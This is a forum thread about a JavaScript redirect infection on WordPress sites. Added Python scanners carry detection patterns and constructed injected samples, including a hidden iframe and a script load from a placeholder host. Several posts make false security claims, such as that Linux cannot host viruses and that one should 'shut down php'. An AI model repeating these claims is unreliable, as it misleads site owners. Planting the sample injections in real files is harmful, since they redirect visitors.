WARNING - WORDPRESS.COM HAS JS REDIRECT VIRUS...UPDATE...NOT WORDPRESS

by HeySal
135 replies
APPARENTLY WORDPRESS IS NOT THE CULPRIT - COINCIDENCE THAT THE SITE WAS HIT WHILE I WAS BROWSING WORDPRESS - MORE INFO ON POST 107 - THIRD PAGE.

I was just in admin on my new blog - was browsing the themes and all of a sudden my avast went nuts. I cut the connection but it was too late - my blog has the JS redirect virus now -- new so I'm just going to toss it and hope that it can't spread on that server.

It is on the WP website itself so EVERYONE with WP might be vulnerable now.
Best thing you can do is shut down your php until they fix their virus problem because it will invade your whole site - everything but HTML.

This is NOT a joke.

I have contacted WP in a bug report and reported the virus on twitter hoping their admin will see it quickly - if anyone has an inside track to WP admin - they need to be notified IMMEDIATELY.
#redirect #virus #warning #wordpresscom
  • Soflyy:
    Yeah, because it's really possible to shut down your "php"...
    • bookmarkr:
      Originally Posted by HBZSoftware.com:

      Yeah, because it's really possible to shut down your "php"...
      At least you're getting the heads-up if you have a blog on wordpress.
    • HeySal:
      Originally Posted by HBZSoftware.com:

      Yeah, because it's really possible to shut down your "php"...
      Look I'm not a tech but I do know that this can wipe out your php because my main site was hit a few months back - and my tech is world class security - ask Kevin Riley and Peter Bestel if I'm kidding. You might not be able to turn off your php, but everything on it can get pretty badly messed up from these things. This isn't a normal virus. It's taking down sites left and right.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

    • GarrieWilson:
      Originally Posted by HBZSoftware.com:

      Yeah, because it's really possible to shut down your "php"...
      You can disable PHP or tell it PHP files only use the extension .xxx
      Signature
      Screw You, NameCheap!
      $1 Off NameSilo Domain Coupons:

      SAVEABUCKDOMAINS & DOLLARDOMAINSAVINGS
  • Michael Silvester:
    Wow...

    Thanks for the heads-up Sal!

    So you were actually inside your wordpress.com admin
    when that all happened?

    Take Care,

    Michael Silvester
  • HeySal:
    I not only lost everything php, I can't use mysql at all - we are rebuilding everything possible in HTML - it doesn't seem to affect HTML. I hadn't even started working on this one yet - the address my avast brought up with the alarm was the wordpress install - I hadn't even hit install, page 6 of the themes menu was just loading. As soon as the alarm went off I cut that page and went back to my admin but I already wasn't able to get back on admin - avast blocked it.

    On my other site we lost our forum, cube cart, coppermine photo gallery, and blog. There were so many security holes chewed that the virus was coming back in as fast as my tech could plug the holes. Every page in php was affected.
    Peter Bestel is having problems not being able to keep it off and Kevin just had someone fix his site, not sure if he was able to totally get rid of it but if it is on the Wordpress site itself, nobody is safe and nobody will be able to keep it off. They are on their way to crashing out php on a lot of servers.
  • GarrieWilson:
    Sal,

    You might want to consider getting a new host that will keep your server secure and a new tech guy because it sounds like he isn't as great as you may think.
    • HeySal:
      Originally Posted by GarrieWilson:

      Sal,

      You might want to consider getting a new host that will keep your server secure and a new tech guy because it sounds like he isn't as great as you may think.
      Garrie - my tech is out now (heart surgery and family problems) he disabled everything for us though - and plugged the holes but didn't get everything cleaned - he did security for Government websites.

      Anyhow -- this isn't MY site I'm talking about now - - this is on WORDPRESS's site. That means every script hooked to it is in danger - and if you want to mess with it, fine, but you might want to talk to Kevin and find out the problems that his tech went through with it if you don't think mine was capable. Or find out if Peter was able to FINALLY get them off or if he is having to rebuild (which won't do much good since it's on wordpress itself now).

      Like I said - this is not a JOKE - not by a hell of a longshot. No one who has dealt with this one so far is going to take this lightly.
  • Adrian Cooper:
    Originally Posted by HeySal:

    I was just in admin on my new blog - was browsing the themes and all of a sudden my avast went nuts. I cut the connection but it was too late - my blog has the JS redirect virus now -- new so I'm just going to toss it and hope that it can't spread on that server.

    It is on the WP website itself so EVERYONE with WP might be vulnerable now.
    Best thing you can do is shut down your php until they fix their virus problem because it will invade your whole site - everything but HTML.

    This is NOT a joke.

    I have contacted WP in a bug report and reported the virus on twitter hoping their admin will see it quickly - if anyone has an inside track to WP admin - they need to be notified IMMEDIATELY.
    My servers have world class security as well. On one server I host sites for others, many of which have been hacked.

    After much digging I discovered that the sites had actually been hacked over FTP.

    Looks to me as if the users have caught a "drive by" trojan which is either a key logger or sends login details to the hacker.

    I do not know the origin, but I do know it is spreading fast around the 'net.

    I always suggest people run an anti-trojan program every day. The best in my view is:

    A-Squared

    Not aff link.
    • Ken Strong:
      Originally Posted by apc01:

      I always suggest people run an anti-trojan program every day. The best in my view is:

      A-Squared

      Not aff link.
      Is this program different from what Spybot does?
      • Peter Bestel:
        Originally Posted by KenStrong:

        Is this program different from what Spybot does?
        Ken,

        A-Squared seems to catch a LOT more than Spybot. I've been running Spybot, followed by A-Squared, followed by Malwarebytes, all in safe mode, after switching off System restore. It takes a few hours but it's worth it.

        Remember to switch System Restore back on once you're done.

        Peter

        PS Be aware that these progs can throw up 'false positives' ie harmless files that it 'thinks' are bad guys. Confusing eh?
  • George Wright:
    HeySal,

    Forgive my ignorance. When you say Wordpress are you talking about the blogs that are actually hosted by WP or the WP blogs we have installed on our own hosts.

    Thanks,

    George Wright
    Signature
    "The first chapter sells the book; the last chapter sells the next book." Mickey Spillane
    • HeySal:
      Originally Posted by George Wright:

      HeySal,

      Forgive my ignorance. When you say Wordpress are you talking about the blogs that are actually hosted by WP or the WP blogs we have installed on our own hosts.

      Thanks,

      George Wright
      George - anything php is vulnerable. I'm hearing a lot of denial here but this is the worst to hit the net yet. It is of Russian origin.

      At the end of last year Government computers were hacked. My tech's computer was hacked -- at the bios level! A few months later the JS redirect viruses started cropping up -- a lot of people that have it don't even have a clue. Avast will tell on it, but won't take it off, even though it looks like it is doing or has done so. It has to be removed manually.

      On my site and many others WP was hosted on my server - I don't use fly by night servers, but still will be going to servage after this - just dumping everything that worked on php.

      We had them get on our site manually - Fin had it hooked up so bots couldn't get on it - it was a live member. Got in and ran something on it manually from what he could tell. Built security holes all over so they could get back in then set a bot in there and loaded fake JS codes on EVERY PAGE that wasn't pure HTML. It was a mess. Enough so that I'm just dumping the whole load of php programs. After 3 years of continual build and a thousand or two pages, it's just easier.

      ECS_Dave just set this WP up for a JV we are getting ready to build. So the blog is on his server - not sure which one - doesn't matter, the virus came straight from the wordpress site. I was browsing for a theme and page 6 of the theme menu was loading and that is when my avast went off. I disconnected from the page immediately but it wasn't fast enough because I can't access my admin page now - my Avast won't let me. It was that fast. Avast gave the address of the virus as http://wordpress...../install/ but I had not even tried to install one of the themes yet.

      That's all I can tell you. It is on wordpress.
  • warf:
    If you downloaded anything from any warez sites a person would be just asking for a hijack. Another thing: avoid windows servers. Linux can't physically host a virus. It's totally impossible. The only thing an iframe virus is, is this: an iframe that opens a location on another website (server) and hosts the virus or malware etc. etc. etc.
    The best way to avoid this:
    1.) only go to sites that you are familiar with
    2.) use upper and lower case letters with symbols in your passwords to your websites.
    3.) if you have to go to a website, go to yahoo google msn and see what is pulled up about the site. even siteadvisor.com/sites/thewebsitename.com/summary/
    4.) before installing any program do your homework on it to ensure that you're not installing a program that has a known exploit.

    Anyhow I hope I was of some assistance
  • Peter Bestel:
    Can't join in the conversation much as I'm just out the door, but Sal is right, nasty little buggers. I can't confirm that the Wordpress site is infected (don't fancy going there just to check) but if it's on your server then your blogs and websites become unusable, flagged as trojan sites and redirect to numerous 'suspicious' sites.

    My sites are looking OK just now but I've had to spend a lot of time on this issue and I've become a tad paranoid because of it.

    Peter
  • HeySal:
    yeah - avast gave a wordpress.com address for it -- but I was in such a damned big hurry disconnecting before it got my admin that I didn't get the whole thing - got my admin anyway. I am scanning my own computer right now just for gp's and will check my log and see if the complete address is listed even though I disconnected like a mad hatter to get away from it. I know it was on page 6 of the theme menu if you search it without parameters - but all that means is that before the night is over it will probably be on all of the themes and into the widgets as well. It travels damned fast once it gets in. With so few anti-virus programs able to detect it half the web is going to be infested if they don't shut it down right away.
  • emigre:
    So if your site is infected it looks all scrambled up or how can you tell if it's been infected?
  • HeySal:
    You won't see it. The only way you will know it is there is if you have Avast - it will alert you that there is a virus. If you are good at JavaScript code you will see slight differences from real code - it loves yahoo counters. If you have one and know the JavaScript you have almost an automatic signal right there. Not sure how the site will act to others because my avast blocks access to an infected site. Most anti-virus programs won't detect it. If it's on your computer Avast will make you believe it took it off, but it doesn't - you have to do it manually - if you go to my profile, go all the way back to the beginning of my thanked posts and the description of the one you get on your computer itself will be described there. There is a similar audio address, too.

    On your website, it just creates complete havoc as it sinks in (it's a worm that eventually plants a rootkit so nothing is safe if you don't get it off). It will redirect visitors to other sites as well. Not good ones either. Great for your future traffic, eh?

    Thanks Russia - I used to be proud of my Cossack roots.
    • Paul Myers:
      Signature
      Stop by Paul's Pub - my little hangout on Facebook.
      • Martin Luxton:
        I experienced something similar with Kaspersky this week. It flagged ad.doubleclick.net redirects on bbc.co.uk and apple.com as phishing sites.

        I phoned doubleclick about it and it seems to have cleared up.

        Martin
        • cima:
          Sorry for being such an idiot, but is there any difference if you have a mac? I mean, can my blog be infected even if I have a mac or is it only affecting people using Microsoft Windows?

          Cheers, Samuel.
          Signature
          My Brand New Forex Trading System :
          www.UltimateForexTradingMethod.com

          And My Forex Review Blog : www.UltimateForexReview.com
          • John Henderson:
            Originally Posted by cima:

            Sorry for being such an idiot, but is there any difference if you have a mac? I mean, can my blog be infected even if I have a mac or is it only affecting people using Microsoft Windows?
            Samuel, the infection happens on the remote server that hosts your blog -- not on the computer you have at home.

            However, the operating system that your server uses (Windows, Linux, MacOS) could be a factor in how susceptible it is to certain attacks.
            • Adrian Cooper:
              Originally Posted by John Henderson:

              Samuel, the infection happens on the remote server that hosts your blog -- not on the computer you have at home.

              However, the operating system that your server uses (Windows, Linux, MacOS) could be a factor in how susceptible it is to certain attacks.
              John: While that is generally true, there is a new breed of attack happening now.

              Hackers are collecting logins via trojans and hacking sites over FTP - I am sorting out this issue for people hosted on one of my servers.

              Trojans are nasty and insidious, which is why everyone should regularly scan for them using A Squared or whatever.
              • John Henderson:
                Originally Posted by apc01:

                John: While that is generally true, there is a new breed of attack happening now.

                Hackers are collecting logins via trojans and hacking sites over FTP - I am sorting out this issue for people hosted on one of my servers.

                Trojans are nasty and insidious, which is why everyone should regularly scan for them using A Squared or whatever.
                Yes, my mistake... An infection on your desktop machine co-ordinated with an attack on your online accounts and hosted space. Very nasty.
                • Tony Dean:
                  Does this mean we can't visit any WP blogs out there that are specifically hosted at WP?
                  Or can we visit other blogs that use WP elsewhere?
          • GrantFreeman:
            It's not a dumb question According to this it's possible:

            Are Windows PCs Threatened by Malware Harbored on Mac & Linux OS's? - Security Corner

            The way I understand this, is if I downloaded a wordpress theme on my mac, and:

            • uploaded it to my server space - It could affect people with PCs that visit my site
            • sent it to a friend with a PC - It could affect my friend's computer

            Edit: or is this just an attack on web hosting machines only? Trying to understand this.

            Grant

            Originally Posted by cima:

            Sorry for being such an idiot, but is there any difference if you have a mac? I mean, can my blog be infected even if I have a mac or is it only affecting people using Microsoft Windows?

            Cheers, Samuel.
          • Adrian Cooper:
            Originally Posted by cima:

            Sorry for being such an idiot, but is there any difference if you have a mac? I mean, can my blog be infected even if I have a mac or is it only affecting people using Microsoft Windows?

            Cheers, Samuel.
            Hackers write trojans for PC's.

            A Mac is much safer from that perspective.
          • zoobie:
            Originally Posted by cima:

            Sorry for being such an idiot, but is there any difference if you have a mac? I mean, can my blog be infected even if I have a mac or is it only affecting people using Microsoft Windows?

            Cheers, Samuel.

            Well Samuel, it is a php exploit or javascript level. It has nothing to do with whether you are using Windows, MAC or Linux. It affects the web browsers, perhaps IE I think...

            any issue using Firefox? anyone knows?
  • GrantFreeman:
    Thanks Sal. Considering starting a wordpress blog tonight and came across the thread. I see a few mentions of the JS virus at McAfee's site:

    JS/Downloader-BNL

    Is this the same one you're talking about? If it is,

    "This trojan can get installed while browsing Websites where it has been hosted."

    Sounds like it might be a good idea to wait on installing any WordPress themes if anyone else is thinking about it.

    Grant
  • Fernando Veloso:
    Thanks for the heads-up Sal.

    Damn, Lots of trouble ahead this weekend. Is Hostgator usually secure from these issues?
    Signature
    People make good money selling to the rich. But the rich got rich selling to the masses.
    • HeySal:
      Originally Posted by Fernando Veloso:

      Thanks for the heads-up Sal.

      Damn, Lots of trouble ahead this weekend. Is Hostgator usually secure from these issues?
      Usually secure doesn't seem to matter much with this one. As I said - the one on my site was actually planted by a member - and that means a live person brought it in. Bots could NOT get on my site. We were actually lulled by our level of security. Hadn't had spam on the site of any sort in over a year. It was a Russian - member name "easter" password "bunny". Real sense of humor. The virus seems to build security holes before it drops codes so that when it gets shut out it can get back in, then it starts on Java codes. The codes are very similar to real codes. You have to check every inch of your site when infected.

      This virus started around about the time the US Gov computers got hacked. That might be a coincidence, but it also might just be some sort of show of power, too. Both Russian sources. So are they going to cyber war on the world or what?

      IF you think that email phishers were sick *******s - this thing makes them look like boy scouts. I'm wondering how long it's going to be before they start stamping this crud with an "over 100 million served" sign.
      • cima:
        Thanks everybody for having answered... That seems to be such a nasty virus. But why do those jerks need to set up such virus ?!?!! What's the interest ??
        • Barbara Eyre:
          I'm still confused, as this question hasn't been directly answered - I'm seeing references to both.

          Does this affect only blogs hosted at WordPress.com ?

          Or - does it also affect blogs that we install on our own websites?

          Or - does it only concern WordPress themes (not themes from 3rd parties), which means it doesn't matter if your blog is installed on your own site or is hosted by WordPress.com ?
          • Susan Hope:
            Originally Posted by Barbara Eyre:

            I'm still confused, as this question hasn't been directly answered - I'm seeing references to both.

            Does this affect only blogs hosted at WordPress.com ?

            Or - does it also affect blogs that we install on our own websites?

            Or - does it only concern WordPress themes (not themes from 3rd parties), which means it doesn't matter if your blog is installed on your own site or is hosted by WordPress.com ?
            You and me both, I would also like clarification on these points, if anyone can give it that is

            Sue
            Signature
            One-to-One WordPress Coaching Service Available at Low Hourly Rate - Let the frustration end now! WordPress Installs, Theme Design, Site Tweaks & other WordPress services available
            Find me on Pinterest: PINTEREST
  • John Henderson:
    While I was getting something to eat today, I was watching "Working Lunch" on BBC2 (it's a show dedicated to money and business matters, and it's on at lunchtime).

    The hosts of the show said "The gremlins have got into our website, so we can't direct you to that at the moment...". I immediately thought of this thread...

    http://news.bbc.co.uk/1/programmes/w...ch/default.stm
  • CDarklock:
    Why exactly is this story not on Slashdot - or any other news outlet I can find - after nine hours? Is this not really a WP site issue?
    Signature
    "The Golden Town is the Golden Town no longer. They have sold their pillars for brass and their temples for money, they have made coins out of their golden doors. It is become a dark town full of trouble, there is no ease in its streets, beauty has left it and the old songs are gone." - Lord Dunsany, The Messengers
  • MichaelHiles:
    Hey HeySal... PHP is teh suxx0r... in fact, any interpreted script is more vulnerable... check out DotNetNuke - The Leading Open Source Web Content Management Framework for ASP.NET
  • Peter Bestel:
    This is my experience for those that need some clarification.

    I've got a number of wordpress blogs hosted on Dreamhost (shared hosting). I use a mix of freebie themes and a few on the paid theme, Thesis. About three weeks ago my PC got a bunch of trojans, viruses etc all at once. At the same time my Dreamhost account was attacked with this Javascript iframe redirect, affecting ALL my wordpress blogs and a few static websites that I've got on that server.

    It installs extra code into php files, normally index.php, admin.php, a few theme php files including both the free ones and Thesis and also onto some plugin files.

    Installing Wordpress plugin 'Exploit Scanner' identified the baddies and I was able to clean up all the sites, only for it to return a few days later.

    I purchased Craig Desorcy's Block Lock Down e-book, followed his instructions and since have been clean. Can't recommend that one highly enough.

    Cleaning the PC has taken an eternity but I reckon I'm as clean as I can be for now.

    I can't comment on the issue with the actual Wordpress site being infected as I've not experienced it, but it's not impossible, for sure.

    I reckon the initial infection on my PC keylogged my FTP and got to my server that way. I've got Roboform but for some reason wasn't using it for Filezilla (which I've since dumped). I now use Secure FTP together with Roboform.

    Touch wood, everything appears clean, but I've said that before...

    Check out the link that Paul Myers posted earlier in this thread, pretty much explains the minimum that needs to be done.


    Peter

    PS No doubt better quality hosting may have saved some hassle - hindsight's such a wonderfully accurate science.
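A scanner for the kind of injected code Peter describes above: extra code dropped into index.php, admin.php, theme and plugin files, and the hidden iframe redirect that sends visitors elsewhere. This is an added example written for this page; it is not the Exploit Scanner plugin, Block Lock Down, or code from any poster. The signature patterns, the sample tree it writes under a temporary directory, the file contents and the placeholder host example.invalid are constructed assumptions for illustration.

```python
"""Scan a WordPress tree for code injected into PHP, JS and HTML files.

Added example written for this page; it is not the Exploit Scanner
plugin or any poster's code. The signatures and the sample tree below
are assumptions chosen to illustrate the injections the thread describes.
"""
import os
import re
import tempfile

# Signatures for commonly injected content (assumed; tune for your tree).
SIGNATURES = {
    # iframe hidden by zero size or an inline style
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(?:width\s*=\s*['\"]?0(?!\d)|height\s*=\s*['\"]?0(?!\d)"
        r"|visibility\s*:\s*hidden|display\s*:\s*none)",
        re.IGNORECASE),
    # PHP dropper: eval() fed by a decoding function
    "php_eval_decoder": re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(",
        re.IGNORECASE),
    # preg_replace with the /e modifier runs the replacement as PHP
    "php_preg_replace_e": re.compile(
        r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-z]*e[a-z]*['\"]",
        re.IGNORECASE),
    # JavaScript hidden behind URL-encoding or long char-code lists
    "js_obfuscated_write": re.compile(
        r"document\.write\s*\(\s*unescape\s*\(", re.IGNORECASE),
    "js_fromcharcode_blob": re.compile(
        r"String\.fromCharCode\s*\((?:\s*\d+\s*,){20,}", re.IGNORECASE),
}
SCAN_EXTENSIONS = {".php", ".js", ".html", ".htm"}


def scan_text(text):
    """Return the sorted names of every signature that matches text."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan_tree(root):
    """Walk root; return {relative path: [signature names]} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip it, but do not abort the scan
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed sample tree: a clean index.php plus three files carrying the
# kinds of injection the posts describe (hidden iframe, eval dropper,
# obfuscated document.write). example.invalid is a placeholder host.
SAMPLE_FILES = {
    "index.php":
        "<?php\n/** Front to the WordPress application. */\n"
        "require('./wp-blog-header.php');\n",
    "wp-admin/admin.php":
        "<?php\ndefine('WP_ADMIN', true);\n"
        "eval(base64_decode('ZWNobyAiaGkiOw=='));\n",      # injected dropper
    "wp-content/themes/twentyten/footer.php":
        "<?php wp_footer(); ?>\n"
        '<iframe src="http://example.invalid/in.php" width="0" height="0"'
        ' style="visibility:hidden"></iframe>\n</body></html>\n',
    "wp-content/themes/twentyten/style.css":
        "body { color: #000; }\n",                         # not scanned
    "wp-content/plugins/counter/counter.js":
        "document.write(unescape('%3Cscript%20src%3D%22http://example.invalid"
        "/c.js%22%3E%3C/script%3E'));\n",
}


def build_sample_tree():
    """Write SAMPLE_FILES under a fresh temporary directory; return its path."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel_path, hits in sorted(scan_tree(sample_root).items()):
        print(f"{rel_path}: {', '.join(hits)}")
```

Run it once against a known-clean copy of the same WordPress release before trusting it on a live site, so you learn its false positives (some legitimate themes and counters do use document.write or String.fromCharCode), and treat a hit as a reason to diff that file against the official release rather than as proof on its own. Since the posts above trace reinfection to FTP credentials stolen from the desktop, cleaning the files without also rotating those credentials and the hosting account password leaves the door open for the next round.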
  • Mark Riddle:
    A Short answer to the can the mac be infected.

    YES, and thousands are, because so few people even bother using AV software on macs there are tons of them infected.

    Remember, the Mac Operating system isn't really an independent system, it's an interface written on top of the BSD version of unix.

    Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


    Mark Riddle
    Signature
    Today isn't Yesterday, - Products are everywhere if your eyes are Tuned!
    • ECS Dave:
      Originally Posted by Mark Riddle:

      Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


      Mark Riddle
      Actually Mark, Sal's talking about a self-hosted wordpress installation.
      She was using the "Add New Themes" interface, built into the WP
      dashboard, which links to the wp-themes.com site. Being the brave
      soul that I am, I browsed the pages myself, but (thankfully) was unable
      to recreate the error/problem/issue.

      Be Well!
      ECS Dave
      • ECS Dave:
        I hope the below helps...

        Originally Posted by Leon McKee:

        Sal, I wanted to clarify what you had been doing when this all started for this specific occurrence. You indicated it was wordpress.com so did this happen on the wordpress.com site or "your" hosted site while browsing themes in WP 2.8? I'm wondering if you had been actually accessing the wordpress.org site via the "add new themes" option?

        Leon McKee
        Originally Posted by ECS Dave:

        Actually Mark, Sal's talking about a self-hosted wordpress installation.
        She was using the "Add New Themes" interface, built into the WP
        dashboard, which links to the wp-themes.com site. Being the brave
        soul that I am, I browsed the pages myself, but (thankfully) was unable
        to recreate the error/problem/issue.

        Be Well!
        ECS Dave
        Further news...

        I have notified the server company of this issue...
        Am awaiting their reply...

        Be Well!
        ECS Dave
    • Leon McKee:
      Mark, can you provide some independent links to verify your statements concerning the Mac OS?

      Leon McKee

      Originally Posted by Mark Riddle:

      A Short answer to the can the mac be infected.

      YES, and thousands are, because so few people even bother using AV software on macs there are tons of them infected.

      Remember, the Mac Operating system isn't really an independent system, it's an interface written on top of the BSD version of unix.

      Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


      Mark Riddle
      • Mark Riddle:
        Originally Posted by Leon McKee:

        Mark, can you provide some independent links to verify your statements concerning the Mac OS?

        Leon McKee
        Mac OS X - Wikipedia, the free encyclopedia

        FreeBSD - Wikipedia, the free encyclopedia

        Apple - Mac OS X Leopard - Technology - UNIX
        • Leon McKee:
          Mark, what I'm asking for are specific links that show the Mac OS is or has been infected. A lot of marketers do have Macs sitting on their desktops so it's a good idea to stay abreast of these types of issues to say the least.

          Leon McKee

          • Profile picture of the author awesometbn
            Originally Posted by Leon McKee View Post

            Mark, what I'm asking for are specific links that show the Mac OS is or has been infected. A lot of marketers do have Macs sitting on their desktops so it's a good idea to stay abreast of these types of issues to say the least.
            True, the Mac has less market share than other operating systems such as Windows. But Apple still gets attacked like everyone else. Need specific references? Take a look at one of the latest SANS newsletters. Here's the one from June 11, 2009.

            Source: SANS Institute - @RISK: The Consensus Security Vulnerability Alert

            Below is an excerpt about Safari, but there are other software vulnerabilities to worry about such as Microsoft Office for Mac, and others. What this means is you must take a proactive approach to protect yourself and your data if it is important to you.

            Apple's Safari web browser, installed by default on all recent versions of Mac OS X, contains multiple vulnerabilities. The first issue is a memory corruption vulnerability caused due to improper garbage collection of JavaScript set elements in WebCore. The second is an uninitialized pointer issue caused due to calling a method for an object that doesn't exist. The third issue is a memory corruption vulnerability caused by improper handling of the attr() function in a CSS content object. The fourth issue is an error in CFNetwork caused due to misidentification of certain image files as HTML, leading to JavaScript execution. The fifth issue is an information disclosure vulnerability due to errors in CFNetwork. The sixth issue is caused due to memory corruption errors in CoreGraphics while processing arguments. The seventh issue is also caused by memory corruption errors in CoreGraphics, but while handling TrueType fonts. The eighth issue is in FreeType v2.3.8, which has multiple integer overflows. The ninth issue is in CoreGraphics handling malicious PDF files, which might lead to memory corruption. The tenth issue exists while handling PNG files, caused due to uninitialized pointers. The eleventh issue is caused due to improper handling of certain character encodings by ICU. The twelfth issue is multiple vulnerabilities in libxml2 version 2.6.16. The thirteenth issue is bypass of revocation checking caused due to improper handling of EV certificates. The fourteenth issue is that the Reset button in Reset Safari may not remove website passwords from memory immediately. The fifteenth issue is an error in the Private Browsing feature. The sixteenth issue is an error in the open-help-anchor URL handler which may lead to disclosure of local file content. The seventeenth issue is an error in the Safari Windows Installer which might lead to Safari being run with elevated privileges for its initial launch.

            There are some more cross-site scripting, website spoofing, memory corruption and type conversion errors in Apple WebKit which might lead to remote code execution for attackers. Some technical details for some of these vulnerabilities are publicly available.
            • John Henderson
              Originally Posted by awesometbn

              Below is an excerpt about Safari...
              You missed a line out: "Affected: Apple Safari versions prior to 4.0"
              • awesometbn
                Originally Posted by John Henderson

                You missed a line out: "Affected: Apple Safari versions prior to 4.0"
                Right, I was just displaying an excerpt from the newsletter. For more info about Mac OS vulnerabilities, get it directly from the source, the software manufacturer itself: Apple - Support - Product Security
                • Nightengale
                  Ok, this is scaring me.

                  My site is done all in WP 2.7. I'm not at all techie and I know zilch about the technical side of WP. I barely know what plugins are and I've never installed one myself. I had someone else design my WP site and a second person handled the technical issues of it for me when I needed it customized.

                  I have no idea how to tell if my site's infected or how to protect it. I don't have Avast, and I think I recently deleted AVG; I'll have to download it again.

                  In the meantime, could someone help me by checking it out for me? I'd greatly appreciate it. If it's infected, I need to get it fixed. If not, I need instructions on how to reset the permissions (if that's what will protect me).

                  I'd greatly appreciate any help!

                  Sincerely,
                  Michelle
                  Signature
                  "You can't market here. This is a marketing discussion forum!"
  • ECS Dave
    I'm not certain how this code is getting into the php files...

    I looked at a couple and they had some encoded javascript code
    at the end of each of them. I didn't (shame on me) note which files,
    but as this was a "new" installation, went ahead and uninstalled
    using the Fantastico utility. I then installed a new instance of the
    latest WordPress (2.8), and have not seen any issues, thus far.

    Of course, the password was changed...

    By no means am I a web-security expert, nor do I portray one
    in any shape or fashion, anywhere...
    However, I have learned
    the very first line of defense should be one's own machine.
    This includes, but is not limited to, a current, updated, and
    reputable virus scanner -- A "malware" scanner -- and perhaps
    some diligence with regards to the sites you visit.

    Be Well!
    ECS Dave
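What Dave describes, obfuscated JavaScript appended after the PHP code in each file, is a pattern a scanner can look for. As an added example, not code from the thread or from WordPress, here is a heuristic scan over two constructed files; the "injected" block in the sample decodes to nothing more than alert(1).

```python
"""Heuristic scan for PHP files with an appended, obfuscated <script> block.
Added example, not from the thread; the two files it scans are constructed,
and the injected block decodes to a harmless alert(1)."""
import re
import tempfile
from pathlib import Path

# Signs that a script block is hiding what it runs. The escape-run patterns
# can also match legitimately encoded data, so treat hits as leads, not proof.
OBFUSCATION_MARKERS = {
    "eval_of_decoded_string": re.compile(
        r"eval\s*\(\s*(unescape|String\.fromCharCode|atob)\b", re.I),
    "document_write_unescape": re.compile(
        r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "percent_escape_run": re.compile(r"(%[0-9a-f]{2}){12,}", re.I),
    "hex_escape_run": re.compile(r"(\\x[0-9a-f]{2}){12,}", re.I),
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

CLEAN_PHP = (
    "<?php\n// constructed: an ordinary theme file\nget_header();\n?>\n"
    "<script>console.log('theme ready');</script>\n"
)
# Same file with a block tacked on the end; the escapes spell alert(1).
INJECTED_PHP = CLEAN_PHP + (
    "<script>eval(unescape('%61%6c%65%72%74%28%31%29'))</script>\n"
)


def trailing_script(source):
    """Body of the last <script> block after the final '?>' (whole file if
    there is no '?>'); None when no script block follows the PHP code."""
    tail = source[source.rfind("?>") + 2:] if "?>" in source else source
    blocks = SCRIPT_RE.findall(tail)
    return blocks[-1] if blocks else None


def scan_php_source(source):
    """Names of the obfuscation markers found in the trailing script block."""
    body = trailing_script(source)
    if body is None:
        return []
    return [name for name, rx in OBFUSCATION_MARKERS.items() if rx.search(body)]


def scan_tree(root):
    """Scan every .php file below root; map relative path -> markers for hits."""
    root = Path(root)
    suspicious = {}
    for php in sorted(root.rglob("*.php")):
        markers = scan_php_source(php.read_text(errors="replace"))
        if markers:
            suspicious[str(php.relative_to(root))] = markers
    return suspicious


def build_sample_tree():
    """Constructed tree: one clean and one tampered copy of a theme file."""
    root = Path(tempfile.mkdtemp(prefix="php-scan-"))
    for sub, body in (("clean", CLEAN_PHP), ("hacked", INJECTED_PHP)):
        (root / sub).mkdir()
        (root / sub / "header.php").write_text(body)
    return root


if __name__ == "__main__":
    print(scan_tree(build_sample_tree()))
```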
  • HeySal
    That's right Mark - this time I am talking about the wordpress site itself. I was browsing the themes available when I was hit.

    On my other site - the WP was on my site's server - but it was actually the phpBB forum that they came in through.

    Once more - if you have php scripts running, you are vulnerable. Anything with 777 permissions is vulnerable. I don't think it matters what system you are on and I think that some hosts are safer than others but not sure that any are completely safe. I'm not sure at this point if anything will ever be completely safe again.

    I think I'm seeing that AVG is also able to detect the virus. Still probably have to remove it by hand; it really knows how to protect itself.

    Whoever said their static scripts got hit too - that is just too scary to think about.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    • Bamma
      Originally Posted by HeySal

      That's right Mark - this time I am talking about the wordpress site itself. I was browsing the themes available when I was hit.

      On my other site - the WP was on my site's server - but it was actually the phpBB forum that they came in through.

      Once more - if you have php scripts running, you are vulnerable. Anything with 777 permissions is vulnerable. I don't think it matters what system you are on and I think that some hosts are safer than others but not sure that any are completely safe. I'm not sure at this point if anything will ever be completely safe again.

      I think I'm seeing that AVG is also able to detect the virus. Still probably have to remove it by hand, it really knows how to protect itself.

      Whoever said their static scripts got hit too - that is just too scary to think about.
      Wrong, just plain wrong. I can prove it and have. I can give ANYONE a folder URL that has 777 permissions and will place a PHP page there for them, and they can do nothing with it. NOTHING.

      This scaremongering needs to stop.

      This happens when someone visits an iframe-exploited system and gets the PC trojaned.
      Then they end up with a keylogger installed that passes off the FTP info.
      It could be you or someone else who has the FTP information on their computer.

      The talk about 777 being the unsafe chmod is wrong also, as 755 will suffice on popular hosts like HostGator etc.

      That being said, one small iframe exploit was done with the phpBB installs.

      90% of what is happening today is due to trojaned computers passing off the FTP information.

      You are busy redoing the pages and not changing the FTP access, and the little bots are running wild and uploading new edits to the files.

      I have spent hours and days with other hosts discussing this, and in every case of widespread exploiting it has ended up the user's fault.

